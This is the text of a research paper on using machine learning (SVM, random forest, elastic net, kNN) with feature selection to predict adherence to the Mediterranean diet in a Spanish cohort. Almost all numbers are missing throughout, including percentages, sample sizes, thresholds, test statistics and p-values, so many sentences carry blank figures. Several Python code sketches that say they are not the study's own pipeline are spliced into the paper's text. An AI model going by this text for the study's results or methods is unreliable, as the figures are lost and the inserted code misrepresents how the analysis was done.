subjects bioinformatics, artificial intelligence, data mining and machine learning keywords feature selection, nutritional status, machine learning, mediterranean diet, support vector machines, nutrition disorders introduction the economic development, urbanisation and industrialisation worldwide have changed individuals’ eating habits and lifestyles, such as smoking, excessive consumption of alcohol, sedentary lifestyle and stress, leading to a nutritional transition which its principle cost in the health sector, is the appearance of non-transmissible chronic diseases. how to cite this article arceo-vilas a, fernandez-lozano c, pita s, pértega-díaz s, pazos a. . identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques. peerj comput. sci. :e doi . /peerj- cs. submitted july accepted july published july corresponding author carlos fernandez-lozano, carlos.fernandez@udc.es academic editor yu-dong zhang additional information and declarations can be found on page doi . /peerj-cs. copyright arceo-vilas et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. http://dx.doi.org/ . /peerj-cs. mailto:carlos.�fernandez@�udc.�es https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ a consequence of the alteration of dietary patterns is what has been called ‘epidemic obesity’, defined by the world health organisation (who) as the first non-viral epidemic of the st century, with million obese people worldwide (finucane et al., ; krzysztoszek, wierzejska & zielińska, ) affecting more than % of the adult population in spain (lópez-sobaler et al., ; anta et al., ; rodriguez rodriguez et al., ). the assessment of nutritional status of a population is one of the best indicators of the health status of the said population, being a methodology that must include three important aspects: a global assessment, a study of the dimension and a study of body composition (ravasco, anderson & mardones, ). with adequate interpretation of the findings, appropriate therapeutic measures should be taken to correct deviations from normality. in the context of nutrition and public health, the mediterranean diet (md) has been forged over the centuries, being characterised by cereal, olive oil, low saturated fats and meat, moderate consumption of dairy and a regular and moderate intake of wine, being a lifestyle in accordance with geographic, climatological, orographic, cultural and environmental conditions within the countries and regions that surround the mediterranean sea (pérez & aranceta, ). there is an increasing interest in the study of the preventive role of md and also as a treatment for various pathologies associated with chronic inflammation, such as metabolic syndrome, diabetes mellitus, cardiovascular disease (cvd), neurodegenerative diseases, breast cancer and psycho-organic deterioration, leading to greater longevity and better quality of life (dussaillant et al., ; chrysohoou et al., ; trichopoulou, ; serra-majem, roman & estruch, ; estruch et al., ; sofi et al., ; della camera et al., ). moreover, the importance of md has also been identified as a potential element contributing to the prevention of breast cancer (shapira, ) or in patients carrying the brca mutation (bruno et al., ). 
in ; unesco declared this diet an intangible cultural heritage of humanity (unesco, ). numerous studies have been published over the past decades, showing the relationship between md intake and cvd (martínez-gonzález et al., ; widmer et al., ), and meta-analyses that relate it to general health status (sofi et al., ). in the greek cohort epic (european prospective investigation into cancer and nutrition study) a -point increase in adherence to this diet was associated with a % reduction in cvd mortality (sofi et al., ). additionally, the analysis of a sub-cohort of , individuals over years old, with a history of myocardial infarction showed that a greater adherence to md had an % drop in overall mortality (lack et al., ). other studies have confirmed these associations, including the follow-up of a spanish cohort of , adults with coronary heart disease. after years, it was observed that two points of increase in adherence to md were associated with a % decrease in coronary risk (trichopoulou et al., ). eating disorders are linked to a distorted perception of one’s own body image, as well as to body dissatisfaction. the importance of a study on body dissatisfaction is due to the fact that recent investigations have confirmed that alterations in body image have a causal arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ participation in an eating disorder, rather than being secondary to it (míguez bernárdez et al., ). body image is considered a qualitative approximation to the nutritional status of the individual (sámano et al., ) and can be determining for their nutritional management (martínez-gonzález et al., ). one of the main fields of application of machine-learning (ml) techniques since its origins is in the field of biomedicine, finding previously published studies in related areas such as biomedical image (fernandez-lozano et al., b), characterisation of different types of carcinomas (kim et al., ), measurement of activity in genetic networks (hu et al., ), deformable models for image comparison (rodriguez et al., ), gene selection, and classification of microarray data (díaz-uriarte & de andrés, ), to name a few. moreover, due to the great versatility of ml techniques, they have been used in a wide variety of application areas, to discover hidden patterns in the datasets: identification and authentication of tequilas (pérez-caballero et al., ), wearable sensor data fusion (kanjo, younis & sherkat, ), predicting the outcomes of organic reactions (skoraczyñski et al., ), animal behaviour detection (pons, jaen & catala, ) or to measure the visual complexity of images (machado et al., ). in particular, ml techniques have proven to be able to uncover unimaginable relationships in very diverse fields of application, such as image or voice recognition, sentiment analysis or language translation (li, li & wu, ; de viñaspre & oronoz, ). the main objective of this work is the development of ml models for the prediction of the degree of adherence to the md. to this end, information on different anthropometric and socio-demographic variables, nutritional status and self-perception of body image is used in order to identify which of the variables have a greater influence and are key in the adherence to a healthy diet such as md, allowing our patients to improve their quality of life and to reduce the negative effects of well-known and related diseases. 
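the objective stated above can be illustrated with a minimal classification sketch. this is not the study's pipeline (which, as described in the following sections, compares several algorithms under a dedicated experimental design with feature selection); scikit-learn is assumed, the data is synthetic, and the feature names are placeholders taken from the abstract.

```python
# illustrative sketch (not the study's pipeline): train a classifier to separate
# good vs. poor adherence to the mediterranean diet from a few anthropometric
# variables. scikit-learn is assumed; the data is synthetic and the feature
# names are placeholders inspired by the abstract.
import numpy as np
from sklearn.ensemble import RandomForestClassifier
from sklearn.model_selection import cross_val_score

rng = np.random.default_rng(3)
feature_names = ["basal_metabolic_rate", "weight", "height",
                 "waist_hip_ratio", "age", "calf_circumference"]

n = 200
x = rng.normal(size=(n, len(feature_names)))
# synthetic label loosely driven by two of the features, just to have structure
y = (0.8 * x[:, 0] - 0.6 * x[:, 3] + rng.normal(scale=0.5, size=n) > 0).astype(int)

model = RandomForestClassifier(n_estimators=200, random_state=0)
scores = cross_val_score(model, x, y, cv=5, scoring="f1")
print("cross-validated f1:", scores.mean().round(3))

# a crude look at which variables the forest relies on most
model.fit(x, y)
for name, importance in sorted(zip(feature_names, model.feature_importances_),
                               key=lambda t: -t[1]):
    print(f"{name:>22s}  {importance:.3f}")
```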
taking into account all of the above, the experimental methodology proposed in this study is based on the collection and generation of data to be analysed from our cohort in galicia (spain), as well as on the use of ml techniques. the purpose is to extract and explain the underlying information in the data and to determine which of these variables are the most important for classifying people as having either good or poor adherence to the md. as mentioned before, there are several health benefits related to this particular diet, especially regarding chronic inflammation, metabolic syndrome, diabetes mellitus, cvd, neurodegenerative diseases, cancer and psycho-organic deterioration, as well as greater longevity and better quality of life. thus, this study is relevant for understanding how to measure the degree of adherence, in order to ensure the aforementioned benefits.

the structure of the article is as follows: in the materials and methods section, the subjects are presented and the variables measured for each of them are described. next, the machine-learning and feature selection techniques are described, along with the experimental design followed to ensure that the results are reproducible and representative of the studied problem. in the next section, the results are presented and discussed, and the final section of the article includes the conclusions of the work.

materials and methods

the present study was structured as follows. initially, a population from our cohort was selected to carry out the study; the population was grouped into two categories: high and low degree of adherence to the md. once the population on which the study was to be carried out had been identified, the information was collected from each of the users of the health system. the type of study carried out is described below, the sample size is justified and all the measurements collected are explained in detail. once the dataset was generated, it was analysed with four different ml techniques and a feature selection phase was applied for dimensionality reduction.

population and data description

this is an observational prevalence study, conducted in northwestern spain (municipality of cambre, a coruña, spain), which included a randomly selected population aged years and over. the sampling population consisted of individuals residing in cambre, identified through the national health system card census. in spain, the national health system has universal coverage, and almost all spanish citizens are beneficiaries of public healthcare services. the sample size was calculated taking into account the total population of the municipality (n = , ). after stratification by age and gender, (n = ) persons were selected to participate in the study. the sample size was estimated using the single proportion formula, with a % confidence interval. a sample size of (n = ) subjects was estimated based on an adherence to the md rate of %. precision was set at . % and the percentage of losses at %. population data are shown in table .

table population data of the municipality of cambre (a coruña) for the year and sample data according to age and sex (columns: age group; population total, men and women; sample total, men and women).
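the sample-size computation described above can be illustrated with a short script. the following sketch is not the authors' code: the confidence level, expected adherence rate, precision and percentage of losses used below are placeholder values (the exact figures are not recoverable from the text), and the standard single proportion formula n = z²·p·(1−p)/d², inflated to compensate for expected losses, is assumed.

# illustrative sketch (not the authors' code): sample size for estimating a
# proportion, adjusted for an expected percentage of losses. the numeric
# values below are placeholders, not the figures used in the study.
from math import ceil
from scipy.stats import norm

def sample_size_proportion(p, precision, confidence=0.95, losses=0.0):
    """n = z^2 * p * (1 - p) / d^2, inflated to compensate for losses."""
    z = norm.ppf(1 - (1 - confidence) / 2)   # two-sided critical value
    n = (z ** 2) * p * (1 - p) / precision ** 2
    return ceil(n / (1 - losses))            # adjust for expected dropouts

if __name__ == "__main__":
    # hypothetical inputs: 95% confidence, 50% expected adherence,
    # 5% precision and 10% expected losses
    print(sample_size_proportion(p=0.5, precision=0.05, confidence=0.95, losses=0.10))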
a personal interview was arranged with each individual. after obtaining their permission and written consent, a trained nurse proceeded to the measurement of the anthropometric variables and to the collection of the data needed to complete the questionnaires. patients who could not go to the health centre for personal or mobility reasons, and those who suffered from a cognitive impairment that made it impossible for them to take part in the study, were excluded. the study received written approval from the regional ethics committee for clinical research (code / ceic galicia).

the information described below was collected from each selected subject. socio-demographic variables: age, gender, level of education, marital status and relationships of coexistence. prevalence of arterial hypertension and smoking: the systolic and diastolic blood pressure of each patient was recorded at the beginning and at the end of the visit, from which the prevalence of arterial hypertension was obtained; the smoking habit was recorded according to self-reported information.

anthropometric variables: the anthropometric parameters allow us to know the state of the protein and caloric reserves, besides providing guidance to the health professional about the consequences of imbalances in these reserves. all measurements were made during the same session, to avoid variations in the environmental or biological conditions. for the measurement of weight and height, the person was barefoot and in light clothing; an mb- t plus asimed scale-rod was used, with an accuracy of grams (weight) and mm (height). bmi was obtained as bmi = weight (kg) / height (m²) and grouped according to the who classification: below 18.5 kg/m², low weight; 18.5–24.9 kg/m², normal weight; 25–29.9 kg/m², overweight; and ≥ 30 kg/m², obesity. the waist and hip circumferences were measured with an inelastic tape measure with the patient standing upright, the abdomen relaxed, the upper limbs hanging at the sides, and the feet and knees together. the waist circumference was measured at the mid-point between the lower costal margins and the iliac crests; it is considered a risk factor for cvd when it is wider than cm in women and cm in men, and a very high risk if it exceeds cm and cm, respectively (alberti et al., ). the hip circumference was measured as the maximum circumference around the buttocks. based on these two values, the waist-hip ratio was calculated using the cut-off points proposed by the who, where normal levels are . in women and one in men, with higher values indicating abdominal visceral obesity, which is associated with increased cardiovascular risk (jover, ). the calf circumference was measured in the widest section of the ankle-knee distance (calf area), showing a good correlation with fat-free mass and muscle strength (rolland et al., ; barbosa murillo et al., ; bonnefoy et al., ); the measurement was carried out with an inextensible tape measure in cm. subscapular skinfold: this fold measures truncal obesity. the measurement is made one centimetre below the lower angle of the scapula, following the natural furrow of the skin.
/ http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ the scapula protrudes when the arm is carefully placed behind the back and the lower angle can be located this way. the measurement of the fold will be diagonally over an angle of ° to ensure the correct thickness measurement. the plicometer forceps should be applied cm in the inferolateral position to the thumb and finger that lifts the fold. to assess the amount of subcutaneous adipose tissue, the skin folds were measured in millimetres in the tricipital, bicipital, subscapular and suprailiac areas. a digital calliper trim metre was used, including a double layer of skin and underlying adipose tissue, always avoiding the muscle. the tricipital skinfold was measured longitudinally, at the back of the non-dominant upper limb, at the midpoint between acromion and olecranon, with the limb relaxed, parallel to the axis of the arm; the bicipital fold was measured at the same point as the tricipital, but on the under arm. the circumference of the arm was measured with an inextensible anthropometric tape measure in cm. the measurement was taken at the midpoint of the non-dominant arm, in the same place where the tricipital skinfold was measured and without compression with the anthropometric tape. once the data of the different measurements were obtained, the mid-arm muscle circumference was found, with which the skeletal muscle mass of the patients (protein compartment) was known and expressed in cm. the arm muscle area indicated that the muscle compartment was based on the brachial circumference and tricipital skinfold measurements. the fat area of the arm indicated that the patient’s fatty compartment used the total brachial area and the muscular area of the arm. the adipose muscular index, which evaluates the nutritional status from the adipose and muscular areas of the arm, was also calculated, being essentially applied in the assessment of obesity. for the determination of body fat percentage by electrical bio-impedance, a beurer and bg model bio-impedance metre was used, with a maximum capacity of kg and a precision of . % for body fat, body water and muscle percentage, and g for body weight, according to the information provided by the manufacturer. these methods are based on physical principles, such as the different ability of conduction or resistance that the tissues show to the passage of an electric current, with greater conductivity of the lean tissues than the fatty ones (norman et al., ). thus, by means of bio-impedance, the following values were obtained: weight, fat mass, liquid mass, muscle mass, bone density, basal metabolic rate (bmr) and activity metabolism. data on socio-demographic variables, such as age, gender (male/female), cohabitation (with whom the live), prevalence of current smokers, ex smokers (patient stopped smoking more than months before entering the study) and non-smokers were estimated. additionally, blood pressure was recorded. adherence to the md consumption of a characteristic food pattern of md is associated with numerous health benefits. these benefits are attributed to bioactive compounds that exert synergistic effects and decrease the risk for development of chronic diseases. in order to assess the quality of dietary habits (adherence to a mediterranean dietary pattern), the md adherence test was used (estruch et al., ). it is a questionnaire arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
https://peerj.com/computer-science/ consisting of fourteen quick questions that allow us to understand whether participants’ usual diet can be considered as following the parameters of the md. each question answered affirmatively adds a point. it is considered that a person correctly follows the md when their score is equal to or greater than nine points. the assessment of nutritional status was determined using the mini nutritional assessment (mna) questionnaire (estruch et al., ). it is a validated method which, through eighteen short questions, evaluates anthropometric measures, dietary habits, lifestyle, pharmacological treatments and mobility, and performs a subjective evaluation of health and nutritional status. the total value of the mna scale is thirty points, a score < being considered malnutrition, there is a risk of malnutrition between and , , and well nourished subjects obtain scores of points and higher. a measure of subjective weight is included by asking: ‘i consider that my weight is: (a) higher than normal, (b) normal, (c) lower than normal’, following the model proposed in (espina et al., ). based on the answer, the population is classified into three groups: ‘fairly subjective weight’ those who believe to be at an ideal weight, ‘more subjective kilograms’ for those who believe that they are overweight and ‘less subjective kilograms’ for those who think they weigh less than they should. two of the eleven sub-scales of garner’s eating disorder inventory (edi- ) (garner, ) were used to study body image: body dissatisfaction (edi-ic) and obsession for thinness (edi-od), as they evaluate aspects directly related to perceptual alterations. the body dissatisfaction sub-scale (edi-ci) measures the dissatisfaction of the subject with the general shape of their body or with those parts of the body that most concern those with eating disorders (stomach, hips, thighs, buttocks). the thinness obsession sub-scale (edi-o) measures concern about weight, diets and fear of getting fat. this questionnaire was validated in spain by (corral et al., ). the fourteen items of these two sub-scales were mixed in the questionnaire to avoid the subjects guessing the construct being evaluated. all items were answered and corrected according to the form proposed in the questionnaire manual. the md adherence test was used to determine the degree of adherence to the md, being a short specific questionnaire of fourteen items validated for the spanish population and used by the md prevention group (predimed) (martínez-gonzález et al., ). machine learning and statistical analysis the authors tested different ml techniques for solving this problem, using cross-validation techniques to avoid over-training, while ensuring that the generalised capability of the model is the best possible, as well as different runs of the experiments to check the behaviour of the techniques. thus, all experiments were repeated ten times to check the stability of the results and the observed deviation between the experiments was small, as shown in the results section. in particular, a tenfold cross validation was used to divide the dataset in such a way that nine random partitions were used to train and one to validate the results, each time taking a different subset for validation. in order to compare the performance of the ml techniques, the area under the receiver operating characteristic curve (auroc) was used. this is a combined arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
measurement which, besides being independent of the threshold used, includes both type i and type ii errors, ensuring that it is not conditioned by differences in the total number of cases of each class (fawcett, ). an experimental design was employed (fernandez-lozano et al., a), allowing us to divide the data using a cross-validation technique which ensured that the performance results obtained, as mentioned above, were not skewed, that is, not merely adjusted to a particular data split, and that researchers are able to identify which hyper-parameters are most suitable to find the best model for each ml technique, according to its particular hyper-parameter configuration. to this end, the programming environment r (r core team, ) and the package mlr (bischl et al., ) were used, which also allowed us to perform the considered experimental design.

in addition, another of the objectives pursued by this study was to find as few variables as possible that would yield a performance value as high as possible, preferably at least equal to that obtained using all available variables. this is basically a feature selection approach whose main aims are the following: to avoid overfitting and improve model performance, to provide faster and more cost-effective models, and to gain a deeper insight into the underlying processes that generated the data, as mentioned in saeys, inza & larrañaga ( ). there are three approaches in ml to perform this process, and a filter approximation was chosen for its speed and its independence from the classifier (saeys, inza & larrañaga, ). in general, performing this feature selection process helps to reduce the noise inherently present in such datasets.

the final step of our experimental analysis was a null-hypothesis test for choosing the best model, in order to determine whether the performance of a particular ml technique is statistically better than the others or not. in our case, as there were more than two repeated measures, an anova or a friedman test should be considered. in particular, three different conditions should be checked: normality, independence and homoscedasticity. if the results fulfil the three conditions, a parametric test is applicable and the anova test should be used; otherwise, the non-parametric version, the friedman test, should be used. finally, a post hoc procedure had to be used in order to correct the p-values for multiple testing.

machine learning techniques for classification problems

a large number of experiments were carried out in an attempt to identify the best ml model able to solve the problem and to ensure that the results are reproducible, real and obtained under equal conditions. in addition, the search space of the best possible parameters for each technique was explored in the same way, so that all techniques had the same possibilities of exploration across the same subsets of data, avoiding the overfitting that could otherwise occur. in particular, the following well-known state-of-the-art techniques were implemented: random forest (rf) (breiman, ), support vector machines (svm) (cortes & vapnik, ; vapnik, ), elastic net (enet) (tibshirani, ; zou & hastie, ) and weighted k-nearest neighbours (knns) (hechenbichler & schliep, ).

random forest (breiman, ) is a state-of-the-art ml technique that has been used in multiple domains with good results.
one of its main strengths is that the results obtained are very easy to understand, it is based on very simple concepts and in general, although it is applied with little experience in the parametrisation of hyper-parameters, good results are obtained. this technique combines multiple decision trees, each of them tuned over a subset of bootstrapped data. in this way, rf combines each of the individual predictions of the decision trees into a global prediction that, in general, is more successful than any of the simple ones. of all the possible variables in the dataset, a number were randomly selected (with replacement) and a number of trees were constructed based on the set of examples used for the training phase and obtained from the previously selected subset. when there are classification problems, it is recommended to use a square root number of the total number of variables existing in the dataset. to explore the solution space in the best way possible, in our experiments we used a parameter domain that was adjusted by a grid search and that, for a number of trees ( , ), we explored randomly selected values of variables ( – ). in addition, values that varied ( – ) according to the size of the terminal nodes of the tree were explored. support vector machines (cortes & vapnik, ; vapnik, ) is also one of the ml techniques that have been commonly used in different domains in recent years and have obtained good results. in fact, along with rf, it is one of the algorithms considered state-of-the-art, easy to understand, and the results obtained are verifiable. in problems that occur during a study, the main objective of svm is to find the hyperplane that best separates the examples between high and low degree of adherence to the md and at the same time to maximise the distance of separation between both examples and the hyperplane. that is it attempts to find the separation hyperplane that generalises in the best possible way (burges, ). to achieve this goal, svm introduces a particular mathematical concept known as kernel: it is a mathematical function that allows the conversion of the input space into a higher dimension, which is used to transform a non-separable linear problem into one that is separable. there are different kernel functions, which in general could be interpreted as a measure of similarity between two objects ( ), and one of the most used is gaussian radial basis (rbf), because basically any surface can be obtained with this function ( ). in this case, the domain of the parameters used to search for the best model consists of a grid search of two different parameters. the first one (parameter c) is directly related to the model and is used as a balance between the classification errors and the simplicity of the decision surface, while the second (gamma parameter) is the free parameter of the gaussian function and in particular, svm is very sensitive to changes in this parameter. for both parameters, and according to the usual practice, values were evaluated in potencies of two between − and . to better understand this technique, the following reading materials are recommended (burges, ; vert, tsuda & schölkopf, ; cristianini & shawe-taylor, ). elastic net (tibshirani, ; zou & hastie, ) is based on lasso (penalised least squares method) and was specifically developed to solve some of the limitations encountered for this technique ( ). on the one hand, a grid search was performed on two arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . 
/peerj-cs. https://peerj.com/computer-science/ different parameters, the alpha penalty parameter was searched (it has values in the range of – ) and in particular the following , . , . , . , . , . , . , . and . on the other hand, the best value of the lambda parameter was used, as recommended by the authors of the technique, from values less than or equal to one to negative powers of ten, in particular the following values were used: . , . , . , . , . finally, a simple knn (hechenbichler & schliep, ) assigned, through a decision rule, an unclassified example belonging to a class by frequency of occurrence to its k-most similar neighbouring examples. then, in accordance to the distance of minkowski for each of the examples and following the maximum accumulated kernel densities the weighted knn are identified (hechenbichler & schliep, ; samworth, ). in particular, neighbouring values of less than or equal to nine were used. therefore, this particular and improved implementation of a knn used kernel functions to measure the degree of similarity of the examples, as previously mentioned in the case of the svms. results the dataset has a total of variables employed to characterise the differences underlying in the data between high and low adherence to the md. the data has been standardised using the z-score formula to have a mean equal to zero and a standard deviation equal to . four different ml techniques were used to verify the results obtained, in an attempt to identify the technique that provides the best-performing results. initially, the analysis of the complete set of study variables is carried out. it can be seen in figs. a and b how the techniques present a fairly stable behaviour in the prediction. even a simple a priori technique such as knn obtains the best results of the entire experimental phase, indicating that almost all variables contain relevant information. in any case, in order to understand whether there is noise or contradictory or correlated information that may be hindering the learning process of the algorithms, a phase of dimensionality reduction will then be carried out. additionally, a process of feature selection was carried out to reduce the number of variables as much as possible, so that the results could remain similar without statistical differences, if not better, for those obtained using all variables. our approach is a filter feature selection using a t-test to quantify the correlation between each feature and the class (high or low adherence to the md) before the training process. three subsets of , and features were evaluated of the original ordering according to the highest p-value from the t-test. the average auroc results of the execution of the ten -fold cross-validation experiments are shown in fig. . as the number of features increases, there is a clear growing tendency in performance and obtained results in auroc with and features are very close to those obtained with the full dataset. in any case, a study should be conducted on whether the differences are statistically significant between the subsets of , variables and the full dataset to ensure that the subset with fewer features is statistically the best option. finally, as shown in fig. a, svm is the best model in three out of the four datasets, and manages to reach values closest to . in auroc. arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. 
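the analysis described in this section was carried out in r with the mlr package; purely as an illustration, the sketch below reproduces the general shape of the procedure in python with scikit-learn (assumed here, not used in the study): features are z-scored, ranked with a univariate filter (for two classes the anova f statistic is equivalent to a t-test), the top k are kept, and an rbf-kernel svm is evaluated with repeated ten-fold cross-validation scored by auroc. the synthetic data, the number of variables and the subset sizes are placeholders, not the study data.

# illustrative analogue (not the authors' r/mlr pipeline): rank features with a
# univariate filter, keep the top k, and evaluate an rbf-kernel svm with
# repeated 10-fold cross-validation using auroc. data here are synthetic.
from sklearn.datasets import make_classification
from sklearn.feature_selection import SelectKBest, f_classif
from sklearn.model_selection import RepeatedStratifiedKFold, cross_val_score
from sklearn.pipeline import make_pipeline
from sklearn.preprocessing import StandardScaler
from sklearn.svm import SVC

# placeholder dataset standing in for the study cohort and its variables
X, y = make_classification(n_samples=200, n_features=30, n_informative=10,
                           random_state=0)

for k in (5, 10, 20, X.shape[1]):                    # hypothetical subset sizes
    model = make_pipeline(
        StandardScaler(),                            # z-score standardisation
        SelectKBest(f_classif, k=k),                 # univariate filter (f ~ t-test for 2 classes)
        SVC(kernel="rbf", C=1.0, gamma="scale"),     # rbf-kernel svm
    )
    cv = RepeatedStratifiedKFold(n_splits=10, n_repeats=10, random_state=0)
    scores = cross_val_score(model, X, y, cv=cv, scoring="roc_auc")
    print(f"k={k:>2}: mean auroc={scores.mean():.3f} (sd={scores.std():.3f})")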
however, as previously mentioned, a single mean measure is not enough; it is necessary to analyse the behaviour of the models during the whole experimental phase and to verify how stable they are, as shown in fig. b. figure b shows that if the number of variables is very small ( ), the models are skewed and there is a higher variability in the performance, because there is not enough information in the data to find a good classification model. it is also important to note that the results obtained with and features showed that this variability was significantly reduced, reaching average and standard deviation values very similar to those obtained using all the variables. as observed in the two previous figures, the best results in auroc were obtained using svm. the same results in accuracy are shown in fig. .

figure summary of the performance (auroc) of the four ml techniques (rf, svm, glmnet and knn) for each one of the subsets of features: (a) average of the experiments for each size analysed and (b) boxplot of the results in order to check the behaviour of the techniques through the learning process.

figure summary of the average performance of the experiments, (a) accuracy and (b) f-measure, of the four ml techniques (rf, svm, glmnet and knn) for each one of the subsets of features.

to check whether the difference between the three winning models (svm with , and all variables) is significant or not, a null hypothesis test was applied. following the experimental methodology proposed in fernandez-lozano et al. ( a), for the normality condition we used the shapiro–wilk test (shapiro & wilk, ), with a confidence level α = . and the null hypothesis that our results follow a normal distribution. the null hypothesis was not rejected, with values w = . and p-value = . ; therefore, our results did follow a normal distribution. next, a bartlett test (bartlett, ) was performed, with a confidence level α = . and the null hypothesis that our data were homoscedastic. the test result indicates that the null hypothesis should not be rejected, with a value of bartlett's k-squared of . with two degrees of freedom and p-value = . . the result of both tests indicates that a parametric anova test should be conducted, with a confidence level α = . , assuming the null hypothesis that our results are statistically equal. the results of the anova test indicate that we fail to reject the null hypothesis and the three ml models are statistically equal, with an adjusted p-value = . . consequently, a -feature model should be considered (bmr, mna total score, weight, height, bone density, waist-hip ratio, smoker, age, edi-od, circumference of the arm, activity metabolism, subscapular skin fold,
subscapular circumference in cm, circumference of the waist, circumference of the calf, brachial area) as the best-performing one, with the half of the initial features that are not relevant for the svm removed.

discussion

to check whether our results are relevant and in accordance with what has been previously published, the state-of-the-art articles published on the topic were reviewed, in an attempt to identify the variables most related to the degree of adherence to the md. the search led to previous studies that also found the variables identified by svm to be among the most important, in particular bmr (cutillas et al., ; careau, ; srivastava et al., ; bonfanti et al., ), mna total score (farias et al., ; zaragoza martí et al., ; abreu-reyes et al., ), weight and height (de la montaña miguélez et al., ; buckland, bach-faig & majem, ; ortega anta & lópez sobaler, ; travé & castroviejo, ), bone density (romero pérez & rivas velasco, ; savanelli et al., ; melaku et al., ; Štefan et al., ) or waist-hip ratio (downer et al., ; estruch et al., ; bertoli et al., ), and whether the patient is a smoker (zaragoza martí et al., ; marventano et al., ; grao-cruces et al., ). therefore, the results were contrasted, confirming the ability of ml techniques to identify underlying patterns in the data. according to the feature selection process, the remaining predictors are not relevant for all the ml techniques.

conclusions

in this work, a first ml-based model was proposed for the prediction of the degree of adherence to the md, using information related to different anthropometric variables, socio-demographic variables, nutritional status and self-perception of body image. initially, experiments with four different ml methods were performed and feature selection techniques were applied to reduce the dimensionality of the problem. svm is the best-performing model according to the experimental design after a null hypothesis test, and our study found that, using a feature selection approach, the number of features could be drastically reduced to (less than half of the initial number) while achieving an equivalent performance value in auroc. the best model obtained was an svm with an rbf kernel as a decision function. the importance of each one of the predictors cannot be studied because a nonlinear svm behaves like a black box and the internal mapping function is unknown; furthermore, the weight vector cannot be explicitly computed. finally, our results are in accordance with the findings of previous publications and have primarily served to establish new factors related to the degree of adherence to the md.

additional information and declarations

funding
this work is supported by the "collaborative project in genomic data integration (ciclogen)" pi / funded by the carlos iii health institute from the spanish national plan for scientific and technical research and innovation – and the european regional development funds (feder)—"a way to build europe". this project was also supported by the general directorate of culture, education and university management of xunta de galicia (ref. ed g/ , ed d / ), the "galician network for colorectal cancer research" (ref. ed d / ), competitive reference groups (ref. ed c / ) and the european regional development funds (feder)—"a way to build europe".
the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: collaborative project in genomic data integration (ciclogen): pi / . carlos iii health institute from the spanish national plan for scientific and technical research and innovation – . european regional development funds (feder)—“a way to build europe”. general directorate of culture, education and university management of xunta de galicia: ed g/ and ed d / . galician network for colorectal cancer research: ed d / . competitive reference groups: ed c / . european regional development funds (feder)—“a way to build europe”. competing interests the authors declare that they have no competing interests. author contributions � alba arceo-vilas performed the experiments, analysed the data, performed the computation work, prepared figures and/or tables, authored or reviewed drafts of the paper, and approved the final draft. � carlos fernandez-lozano conceived and designed the experiments, performed the experiments, analysed the data, performed the computation work, prepared figures and/ or tables, authored or reviewed drafts of the paper, and approved the final draft. � salvador pita conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. � sonia pértega-díaz conceived and designed the experiments, analysed the data, authored or reviewed drafts of the paper, and approved the final draft. � alejandro pazos conceived and designed the experiments, authored or reviewed drafts of the paper, and approved the final draft. ethics the following information was supplied relating to ethical approvals (i.e. approving body and any reference numbers): the study received written approval from the regional ethics committee for clinical research (code / ceic galicia). arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/computer-science/ data availability the following information was supplied regarding data availability: data is available at figshare: fernandez-lozano, carlos ( ): identification of predictive factors of the degree of adherence to the mediterranean diet through machine-learning techniques. figshare. dataset. doi . /m .figshare. .v . supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references abreu-reyes ja, Álvarez-luis d, arteaga-hernández v, sánchez-mendez m, abreu-gonzález r. . mediterranean diet adherence by patients with primary open angle glaucoma. archivos de la sociedad española de oftalmología ( ): – doi . /j.oftale. . . . alberti kgmm, eckel rh, grundy sm, zimmet pz, cleeman ji, donato ka, fruchart jc, james wpt, loria cm, smith sc. . harmonizing the metabolic syndrome: a joint interim statement of the international diabetes federation task force on epidemiology and prevention; national heart, lung, and blood institute; american heart association; world heart federation; international. circulation ( ): – . anta rmo, lopez-solaber am, perez-farinos n, ortega anta rm, lópez-solaber am, pérez-farinós n. . associated factors of obesity in spanish representative samples. nutricion hospitalaria ( ): – . buckland g, bach-faig a, majem ls. . eficacia de la dieta mediterránea en la prevención de la obesidad. una revisión de la bibliografía. 
revista española de obesidad ( ): – . barbosa murillo jap, rodríguez m ng, hernández h de valera ym, hernández h ra, herrera m ha. . masa muscular, fuerza muscular y otros componentes de funcionalidad en adultos mayores institucionalizados de la gran caracas-venezuela. nutricion hospitalaria ( ): – . bartlett ms. . properties of sufficiency and statistical tests. proceedings of the royal society of london: series a, mathematical and physical sciences ( ): – . bertoli s, leone a, vignati l, bedogni g, martínez-gonzález mÁ, bes-rastrollo m, spadafranca a, vanzulli a, battezzati a. . adherence to the mediterranean diet is inversely associated with visceral abdominal tissue in caucasian subjects. clinical nutrition ( ): – doi . /j.clnu. . . . bischl b, lang m, kotthoff l, schiffner j, richter j, studerus e, casalicchio g, jones z. . mlr: machine learning in r. journal of machine learning research ( ): – . bonfanti n, fernandez jm, gomez-delgado f, perez-jimenez f. . effect of two hypocaloric diets and their combination with physical exercise on basal metabolic rate and body composition. nutricion hospitalaria ( ): – . bonnefoy m, jauffret m, kostka t, jusot jf. . usefulness of calf circumference measurement in assessing the nutritional state of hospitalized elderly people. gerontology ( ): – doi . / . breiman l. . random forests. machine learning ( ): – doi . /a: . bruno e, manoukian s, venturelli e, oliverio a, rovera f, iula g, morelli d, peissel b, azzolini j, roveda e, pasanisi p. . adherence to mediterranean diet and metabolic arceo-vilas et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://doi.org/ . /m .figshare. .v http://dx.doi.org/ . /peerj-cs. #supplemental-information 